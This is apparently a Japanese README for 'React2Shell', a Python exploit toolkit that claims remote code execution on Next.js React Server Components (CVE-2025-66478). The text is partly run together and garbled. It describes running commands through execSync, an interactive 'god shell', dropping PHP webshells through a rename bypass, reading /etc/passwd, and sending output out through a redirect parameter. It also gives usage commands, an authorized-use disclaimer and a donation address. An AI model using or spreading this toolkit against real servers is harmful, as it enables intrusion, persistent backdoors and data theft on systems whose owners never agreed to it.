
React2Shell - CVE-2025-66478 RCE Exploit
この Python ツールキットは、Next.js React Server Components (RSC) のプロトタイプ汚染と React.lazy(-1) ガジェットチェーンを悪用し、インタラクティブなゴッドシェル、ファイルアップロード (PHP ウェブシェルドロッパー)、および ?out= 経由のデータ流出を含む完全な RCE アクセスを実現します。

child_process.execSync による RCE → /exploit?out=UIDread /etc/passwd)、アップロード{\"0\":null} → 500 E{\"digest で RSC ハンドラを確認。Location: /exploit?out=id_outputexecSync(cmd) → リダイレクト経由で stdout/stderr を流出。upload_txt local.txt remote.php → 書き込み+リネームバイパス。pip3 install aiohttppython3 main.pyhttp://target.com または targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]Piped: echo \"http://target\n4\" | python3 main.py
ゴッドシェル コマンド:
upload <local.php> <remote/shell.php> # PHP 直接アップロード
upload_txt <local> <remote/shell.php> # TXT→リネームバイパス
upload_bin <local> <remote> # バイナリ(後で chmod)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
許可された侵入テストおよび教育目的のみに使用してください(利用者は ToS に基づく許可を確認済み)。無断使用は違法・非倫理的です。
コーヒーをご馳走してね:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans